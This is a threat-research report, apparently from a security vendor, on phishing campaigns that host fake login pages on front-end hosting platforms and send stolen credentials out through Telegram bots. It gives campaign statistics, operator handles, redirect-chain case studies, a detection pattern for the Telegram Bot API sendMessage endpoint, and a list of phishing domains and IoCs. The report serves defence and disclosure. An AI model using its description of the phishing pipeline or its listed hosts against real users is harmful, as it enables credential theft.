Key Findings

  • Analysis of 9,100 phishing domains that used Telegram bot APIs to relay stolen credentials.
  • Abuse of front-end hosting platforms (FHPs):
    • FHP abuse has grown steadily since early 2021.
    • The number of unique domains leveraging both Telegram bot APIs and FHPs doubled from mid-June to mid-July 2025.
  • Telegram operator artifacts:
    • 4,145 unique Telegram bot tokens (API keys) were embedded in malicious pages.
    • 28% of tokens are reused across multiple domains; some appeared across hundreds of domains in large-scale campaigns.
    • 264 unique Telegram channel or group admin usernames were identified.
    • 25% used more than one domain in their campaigns.
  • Lure types (n=100 visually inspected pages, random sample):
    • 50% presented generic login/webmail interfaces.
    • 20% mimicked banking logins.
    • 30% impersonated business services common in enterprise workflows (for example, WeTransfer, DocuSign).
  • Tactics at scale:
    • One campaign used a single FHP with multiple URL redirects.
    • Another used multiple FHPs to host phishing pages in parallel.

Mitigation Recommendations

  • Control Telegram usage. Detect and block Telegram communications, unless there is a documented business need to allow the Telegram APIs in the corporate environment.
  • Monitor FHP traffic. Closely monitor and, where policy allows, restrict access to frequently-abused FHPs; alert on newly observed domains and suspicious referrer chains.
  • Harden authentication. Enforce multi-factor authentication (MFA) whenever possible, especially for email, VPN, identity providers, and financial portals.
  • Detect Risky sign-ins. Alert on abnormal logins (unusual locations, off-hours access, repeated failures, abnormal travel) and require step-up verification.

Background

In earlier research, we showed how threat actors abuse domain names to distribute malware and highlighted a Zoom-themed campaign hosted on subdomains of front-end hosting platforms (FHPs) such as Surge.sh and Clouflare’s pages.dev.

That finding prompted a broader look at FHP abuse. We uncovered a complimentary trend: instead of leasing dedicated backend infrastructure (servers, IP space and their own domains), threat actors increasingly combine FHPs with Telegram to run phishing campaigns at scale and near-zero cost.

Our analysis suggests the FHP-Telegram pairing has surged in popularity driven by factors such as:

  • Low cost and automation on FHPs. Free or inexpensive tiers and CI/CD-style tooling let operators spin up new sites from templates onto user-specified or randomly generated subdomains, enabling rapid replication.
  • Reputation shielding. Provider-owned domains and IP ranges often carry favorable reputation, helping phishing pages slip past domain- or hosting-based filters.
  • Low-friction operator accounts. Telegram accounts can be created with only a phone number (for example, virtual numbers or prepaid SIMs) and automated via bot APIs.
  • Persistence and convenience. Telegram’s bot ecosystem and hosting posture are frequently abused, offering attackers resilient channels to receive and store stolen credentials.

The result is a tightly-integrated pipeline for large-scale phishing, outlined at a high level in Figure 1.

Figure 1 – Overview of phishing campaigns abusing Telegram and FHPs

This convenience exposes a weakness: bot tokens and related metadata often appear in page source which allows further analysis and clustering of campaigns.

In this report, we analyze 9,100 domains used in phishing campaigns that leverage Telegram bots (but not all use FHPs) between April 2020 and August 2025. We quantify the recent rise in FHP abusehow we identified and grouped thousands of campaigns, and conclude with practical risk mitigation guidance.

 

Phishing With Telegram – Analyzing Abused Domains and Autonomous Systems

The 9,100 domains in our dataset span 227 top-level domains (TLDs). Figure 2 charts the most common TLDs:

  • Generic TLDs (gTLDs): 71% of domains. Traditional gTLDs, such as .com (27%), .net (3%) and .org (3%) remain heavily abused, likely because users tend to trust them. Beyond these, .app and .dev – commonly used by FHPs such as Vercel.app and CloudFlare Pages/R2 – together account for 20% of phishing domains.
  • Country-code TLDs (ccTLDs): 29% of domains. The top 3 – .io (8%), .me (6%), and .sh (4% – are widely associated with FHPs like github.io , glitch.me, and surge.sh (despite their official ties to the British Indian Ocean Territory, Montenegro, and Saint Helena, respectively). The first ccTLD not typically associated with FHPs in our data is .ru,(2%).

Figure 2 – TLD distribution of domains abusing Telegram for phishing

Further evidence of FHP prevalence comes from the Autonomous Systems (AS) hosting IP addresses resolved from these domains.

Figure 3 – AS distribution of the domains abusing Telegram for phishing

Figure 3 lists the top ASes. Only 1.4% of phishing pages are resolved to ASes that SpamHaus currently labels as malicious – unsurprising, since operators avoid providers on major blocklists. The more interesting finding is concentration: 47% of inspected phishing pages were hosted by the top three ASNs, which often underpin FHPs:

  • CLOUDFLARENET (AS13335). Roughly a third of pages here were on CloudFlare Pages (pages.dev) or Cloudflare R2 public-bucket endpoints.
  • FASTLY (AS54113). Most pages here mapped to Glitch.me (33%), GitHub (32%) and Firebase (12%) in our telemetry.
  • AMAZON-02 (AS16509). A substantial share aligned to Vercel (57%) and Netlify (10%) in our dataset.

Figures 2 and 3 together indicate a strong FHP footprint in Telegram-enabled phishing. Next, we examine how this has grown over time.

 

Increase in Phishing Abusing Telegram and FHPs

Figure 4 shows that, after excluding subdomains and counting each base domain (eTLD+1) only once, about half of the domains were registered within the past two years, evidence of accelerating phishing activity.

Figure 4 – Registration-date distribution of the analyzed domains (eTLD+1)

Not all growth is FHP-driven. We also observed:

  • A 2012-1016 registration spike that aligns with ICANN’s new gTLD program, which expanded available gTLDs.
  • 314 domains registered between 2000 and 2010. The vast majority appear to be compromised legitimate site or post-expiration takeovers (re-registered domains leveraging inherited reputation).
  • 120 domains registered before 2000. These often appear in redirect chains that route victims from legitimate services to malicious pages, using platforms such as Google services (e.g. Travel as shown in the figure below), Blogspot, DoubleClick, and local hosting providers servers like nazwa.pl.

Figure 5 groups FHP usage by submission date and shows that Telegram has been exploited to relay phished credentials since early 2020, with adoption rates rising over time. Key takeaways:

  • FHP abuse has grown steadily since early 2021. The share of malicious domains from the six most frequent platforms more than tripled from 5.3% (2023) to 16.3% (2025).
  • The number of unique domains using both Telegram bot APIs and FHPs doubled from mid-June to mid-July 2025.

Figure 5 – Overview of front-end hosting platforms detected in our dataset

Operators may select specific FHPs based on response times to abuse, automation features, and cost. In URLs submitted to URLQuery, Vercel, Glitch, and GitHub accounted for most malicious sites in our sample. From early July 2025, Glitch and GitHub lost momentum in favor of Surge. Notably. Glitch ended web hosting on July 8, 2025, citing increased costs and misuse by bad actors, which likely contributed to this shift.

 

Identifying and Clustering Campaigns

Because Telegram-enabled phishing on FHPs is rising, we outline practical ways to identify and cluster related activity for threat-intel purposes.

On-page indicators we use to cluster campaigns

Phishing pages that leverage Telegram typically embed two or three artefacts that allow reliable grouping:

  • Recipient chats (channels, groups, supergroups, or private accounts) used to receive stolen data.
  • Telegram bot tokens (API keys) used to authenticate and send messages to those recipients.
  • Admin usernames for channels, groups, and supergroups, when exposed.

Clustering domains by bot token (primary) or admin username (secondary) reveals single campaigns spread across many domains and FHPs.

Token reuse across domains

We extracted 4,145 unique bot tokens. Figure 6 shows 1,170 tokens (28%) were reused across multiple domains:

  • 26% were reused across 2-10 domains
  • 2% were reused across 11+ domains

Figure 6 – Telegram bot tokens by number of associated domains

Chat types and administrators

Most recipient chats we observed were private accounts, but we also identified 419 groups, 143 supergroups and 59 channels Where available, we captured admin usernames and participant counts:

  • Most chats were small (1-2 participants), with exceptions, including:
    • 517 chats with 3-10 participants.
    • 13 chats with 11+ participants.
  • We observed 264 unique admin usernames.
    • 197 (75%) appeared in only one domain.
    • Several admins operated dozens of domains (see table below).
    • The same admins sometimes used different bot tokens across different domains.

Admins operating the most domains

Username Display name Domains Comments
Tigerok3001 Tiger OK 79 Prior campaign reporting ties this handle to  >400 pages targeting Meta business accounts.  Most pages on Vercel.app, some on Netlify.app with random naming.
Minion631 Minion 42 All on Vercel.app. Frequent terms include submit-verification-documents and trusted-verification-service.
sxxhhw2 Đào Hải 35 Vietnamese display name. All on Vercel.app with random names. Possibly related to tigerok3001 based on language and similar aliases (e.g. “vlxx12312”).
kindy456 ℂ𝕠𝕞𝕓𝕒𝕔𝕜 10 All on Vercel.app names reference Meta/Facebook (for example metasupport119.vercel[.]app and facebook146.vercel[.]app)
KingZinnizzi KingZinni 8 All on Vercel.app domains allude to a hotel chain.

 

Campaigns using the most simultaneous domains (API-key clustering)

Campaign identifier Number of domains Description
1 104 Cryptocurrency air-drop scam. Pages advertise new cryptocurrencies and victims provide wallet data supposedly to allow a free deposit of the new currency.
2 85 Impersonation of an events ticketing site in Kuwait.
3 76 Phishing pages impersonating a French financial institution. This campaign abused a less frequent FHP (pantheonsite.io) in ~85% of domains.
4 75 Alleged Booking.com reward program.
5 71 Fake Meta reporting about Facebook page deactivation for copyright; hosted on vercel.app.
6 48 Multiple cryptocurrency air-drop impersonations; hosted on vercel.app.

 

These campaigns appear opportunistic, aimed at profiles such as cryptocurrency enthusiasts, customers of specific institutions like the French bank, or Facebook page admins – not at individual enterprises.

Targeting from a random visual sample (n=100 sites)

From 100 randomly selected sites we visually inspected:

  • 50% used generic login/webmail lures.
  • 20% mimicked banking logins.
  • 30% impersonated enterprise services (for example WeTransfer, DocuSign).

Below, we detail two targeted campaigns. Notably, even “targeted” runs often rely on generic templates, rather than faithful clones of corporate applications.

 

Campaign Examples

Case 1 – Using One FHP and Multiple URL Redirects

Between January 17 and February 14, we detected ten malicious links abusing redirects from lcpush.lottecard.co[.]kr (a legitimate Korean credit card provider). These linksrouted victims to subdomains such as:

  • hxxps://Signufarma.istapeyman[.]ir/<redacted_email_address>
  • hxxps://Aventicum.istapeyman[.]ir/<redacted_email_address>
  • hxxps://Ecovadis.istapeyman[.]ir/<redacted_email_address>
  • hxxps://Thermotek.istapeyman[.]ir/<redacted_email_address>

The parent domain istapeyman[.]ir belongs to a legitimate Iranian manufacturer. The listed subdomains were likely hijacked; they reference other organizations by name (for example Signufarma, Aventicum, EcoVadis, and Intertek) and the redacted path fragments included the names of real people in senior roles at those organizations. Those subdomains then redirected users to Amazon S3 buckets:

  • prince-approve.s3.us-east-2.amazonaws[.]com
  • encryptedfile-receipt-mon.s3.us-east-2.amazonaws[.]com
  • accessadmin-filereview-thurs.s3.us-east-2.amazonaws[.]com
  • frival.s3.us-east-1.amazonaws[.]com

The S3 pages posed as parked/placeholder pages for unassigned domains (shown below) and contained e-mail login forms. Entered credentials were exfiltrated to Telegram.

The relay code was a JavaScript file hosted via an FPS gateway:

bafkreih35lw4grtr7sipsf6kuqjrxu5ladnrc4m7zndvzyncny7tlkvure.ipfs.flk-ipfs[.]xyz.

Stolen credentials were sent to a private chat operated by the username newplanner7bot.

Pivoting from these indicators, we found additional targeted organizations in manufacturing, oil and gas, and law across multiple emerging-market countries.

Case 2 – Using Multiple FHPs

On April 30, the domain m3y33.preview.codesignal[.]com was observed hosting a DocuSign look-alike login page, as shown below.

As in Case 1, submitted credentials were forwarded to Telegram. In this campaign, the same Telegram bot token was reused across ten other domains, eight of which hosted on FHPs including Vercel, GitHub, Netlify and Cloudflare. Those domains redirected users to three Replit pages:

  • 282e6099-1df3-4787-8cf7-59508894f6be-00-1cone31uhkga3.sisko.replit[.]dev
  • 0ff638fc-e17b-4709-9e72-c787b2a98a1f-00-20tq7jznm9ozf.pike.replit[.]dev
  • fe6b341c-0131-4185-9b97-40964b3abc5b-00-132d0deoi1w3j.sisko.replit[.]dev

Across these domains we saw heterogeneous lures: Meta violation notices, Microsoft account logins, online banking pages, company-branded job application forms, and WeTransfer/DocuSign impersonations.

From 2,600 distinct victims whose data was relayed via Telegram, the largest share (33%) belonged to Italian research institutions, including the National Research Center (CNR) and several universities. Many  victims worked in biotechnology, biochemistry, and food technology departments. Additional targets included research institutions in France and Greece (molecular biology and genetics), and the Bosnia and Herzegovina Air Navigation Services Agency.

 

Mitigation Recommendations

In our previous research on domain abuse for malware distribution, we outlined controls that also reduce phishing risk:

  • Detect and prevent communications with malicious domains:
    • Educate and enable reporting. Train customers and employees about domain name abuse and how to spot risky (randomness/DGA-like strings, suspicious TLDs, typosquats and abusive subdomains), and to report them through a simple tracked workflow integrated with SOC tooling
    • Enforce DNS egress policy. Route all queries through enterprise resolvers; block direct use of external resolvers and unmanaged DNS over HTTPS (DoH) or DNS over TLS (DoT).
    • Filter at the resolver. Use resolvers with DNS abuse filtering and support for policies such as Response Policy Zones (RPZ) or equivalent deny/allow lists (for example, Quad9 or commercial alternatives).
    • Detect on network and endpoint. Use NDR/IDS and EDR to flag and block outbound DNS, SNI, and Host header requests to known-malicious or newly observed domains.
    • Apply age and reputation controls. Treat newly registered domains and newly observed domains as higher risk; alert or quarantine until vetted.
    • Centralize telemetry. Send DNS logs to the SIEM, enrich with WHOIS, passive DNS, and certificate transparency data to track domain age, eTLD+1 (the registrable base domain) groupings, and reuse across campaigns.

This study highlights that many modern phishing campaigns rely on Telegram bots and front-end hosting platforms (FHPs), so we add the following:

  • Control Telegram usage. Detect and block Telegram communications, unless there is a documented business need Focus on the Telegram Bot API pattern (e.g. api.telegram.org/bot/sendMessage), plus related endpoints (file uploads, getUpdates). Where business use is allowed, allowlist sanctioned bots and destinations, log all access, and alert on token exposure in page source.
  • Monitor FHP traffic. Closely monitor and, where policy allows, restrict access to frequently-abused FHPs; alert on newly observed domains and suspicious referrer chains. In our data, frequently abused FHP domains included: pages.dev, web.app, vercel.app, mybluehost.me, netlify.app, codeanyapp.com, glitch.me, github.io, surge.sh, r2.dev
  • Harden authentication. Enforce multi-factor authentication (MFA) whenever possible, especially for email, VPN, identity providers, and financial portals.
  • Detect Risky sign-ins. Alert on abnormal logins (unusual locations, off-hours access, repeated failures, abnormal travel) and require step-up verification.
  • Kill bad sessions rapidly. Block or invalidate sessions initiated from suspicious logins; force password resets where warranted.
  • Report abuse. Use provider abuse channels (FHPs, Telegram) to accelerate takedown; include IOCs and evidence, such as bot-token strings and referrer chains.

 

IoCs

Handle IoCs only in a controlled analysis environment. The full, continuously updated list is available on the Forescout Research – Vedere Labs threat feed. The items below are those explicitly mentioned in this report:

  • istapeyman[.]ir
  • istapeyman[.]ir
  • istapeyman[.]ir
  • istapeyman[.]ir
  • prince-approve.s3.us-east-2.amazonaws[.]com
  • encryptedfile-receipt-mon.s3.us-east-2.amazonaws[.]com
  • accessadmin-filereview-thurs.s3.us-east-2.amazonaws[.]com
  • s3.us-east-1.amazonaws[.]com
  • ipfs.flk-ipfs[.]xyz
  • preview.codesignal.com
  • 282e6099-1df3-4787-8cf7-59508894f6be-00-1cone31uhkga3.sisko.replit.dev
  • 0ff638fc-e17b-4709-9e72-c787b2a98a1f-00-20tq7jznm9ozf.pike.replit.dev
  • fe6b341c-0131-4185-9b97-40964b3abc5b-00-132d0deoi1w3j.sisko.replit.dev

 

Want to stay on top of the latest threats? Sign up for the Vedere Labs Threat Feed and get the full context of these threats in our monthly newsletter.